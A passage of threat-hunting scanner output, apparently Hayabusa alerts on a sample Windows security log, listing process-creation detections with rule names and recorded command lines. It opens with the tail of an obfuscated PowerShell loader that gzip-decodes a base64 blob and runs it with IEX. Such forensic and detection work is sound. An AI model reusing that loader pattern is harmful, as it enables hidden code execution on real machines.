YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x94c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:40:21.464 +00:00,IE10Win7,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:40:21.464 +00:00,IE10Win7,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:40:21.464 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:40:21.464 +00:00,IE10Win7,4688,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 21:05:56.876 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x144 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 21:06:09.220 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe6c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 21:06:09.236 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xff8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 22:54:48.689 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 22:54:48.720 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc0c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 22:54:49.720 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x7c4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 22:54:49.751 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xf50 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 22:55:08.329 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb0c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:04:23.954 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:06:57.658 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x85c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:06:57.658 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xcf4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 02:07:47.489 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 02:07:47.630 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x7f0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 02:07:48.599 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xb78 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 02:07:48.599 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x37c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 02:08:02.052 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x708 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 02:08:08.052 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x8e0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 02:12:51.579 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x238 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 02:12:51.579 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xe8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 02:19:46.662 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc68 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 02:19:47.615 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x914 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 02:19:47.615 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x994 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 02:20:06.599 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x998 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 02:20:16.443 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x3c0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 02:20:16.443 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x928 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 02:20:16.834 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd48 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 13:57:54.551 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 13:57:54.738 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe60 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 13:57:55.301 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xef8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 13:57:59.004 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x82c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 13:57:59.113 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 13:58:15.410 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xbbc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 13:59:20.128 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xb24 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 13:59:20.284 +00:00,IE10Win7,4688,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 14:01:29.243 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x22c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 14:04:54.584 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 14:14:24.131 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 15:13:21.141 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 16:01:36.820 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xf8c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 16:01:36.883 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x268 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 16:01:36.898 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xc68 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 16:03:36.695 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x68c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 16:03:36.695 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 16:04:11.148 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 16:57:08.802 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0xc5c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 16:57:08.802 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 17:02:48.677 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding | Path: C:\Windows\System32\rundll32.exe | PID: 0xcbc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 17:02:48.677 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 17:02:52.614 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x598 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 20:09:55.671 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x3cc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 20:09:57.781 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb84 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 20:10:11.609 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe9c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 20:10:17.702 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x2f0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 20:12:20.805 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xfd0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 20:12:20.805 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x46c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 20:47:30.057 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 20:47:31.026 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x6a0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 20:47:31.073 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x9c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 20:47:46.745 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe6c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 20:48:04.531 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 21:00:18.540 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 21:12:04.462 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xda0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 21:12:28.290 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: 